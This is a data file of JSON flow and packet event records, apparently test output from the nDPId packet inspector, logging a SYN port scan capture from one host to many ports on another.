+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs9VwAADcGHBasEAAIQA2GNIzTK2fdU4MZAAAAAGACEAD9JAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsIMIAACsG\/LCsEAAIQA2GNIzTAobdU4MZAAAAAGACEAAmBgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/RQAADUGFl6sEAAIQA2GNIzSFxLdUoMYAAAAAGACCAAZfQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsApgAADUGENusEAAIQA2GNIzSCPDdUoMYAAAAAGACCAAnnwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAscmgAADsGmwqsEAAIQA2GNIzSBrfdUoMYAAAAAGACEAAh2AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAse\/kAADQGmHmsEAAIQA2GNIzSJMrdUoMYAAAAAGACBAAPxQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsUJwAAC8GyNasEAAIQA2GNIzSJxDdUoMYAAAAAGACEAABfwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAs0FAAADkGPyKsEAAIQA2GNIzSTj\/dUoMYAAAAAGACCADiTwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsew8AAC4Gn2OsEAAIQA2GNIzSEdfdUoMYAAAAAGACDAAauAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAso\/UAADkGa32sEAAIQA2GNIzSIAHdUoMYAAAAAGACCAAQjgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsoEAAAC4GejKsEAAIQA2GNIzSBSrdUoMYAAAAAGACDAAnZQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsqFkAADUGaxmsEAAIQA2GNIzSAAPdUoMYAAAAAGACCAAwjAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsxHIAACYGXgCsEAAIQA2GNIzSBuHdUoMYAAAAAGACDAAlrgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsDk0AACcGEyasEAAIQA2GNIzSKUbdUoMYAAAAAGACEAD\/SAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsp10AAC8GchWsEAAIQA2GNIzSBJHdUoMYAAAAAGACEAAj\/gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsnbsAADAGeresEAAIQA2GNIzSJATdUoMYAAAAAGACBAAQiwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ54AAC0G89SsEAAIQA2GNIzTA+fdU4MZAAAAAGACCAAspQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsac0AADIGrKWsEAAIQA2GNIzTBEDdU4MZAAAAAGACDAAoTAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":558,"source":"synscan.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"synscan.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAs1CgAADgGPEqsEAAIQA2GNIzTDb3dU4MZAAAAAGACBAAmzwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"synscan.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"synscan.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsz\/oAACoGTnisEAAIQA2GNIzTH1XdU4MZAAAAAGACDAANNwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":560,"source":"synscan.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"synscan.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsMpkAADcG3tmsEAAIQA2GNIzTFmLdU4MZAAAAAGACEAASKgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAswBUAADIGVl2sEAAIQA2GNIzTF4ndU4MZAAAAAGACDAAVAwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsw0kAACoGWymsEAAIQA2GNIzTAdDdU4MZAAAAAGACDAAqvAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"synscan.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"synscan.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsLY8AADMG5+OsEAAIQA2GNIzTB93dU4MZAAAAAGACEAAgrwAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"synscan.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 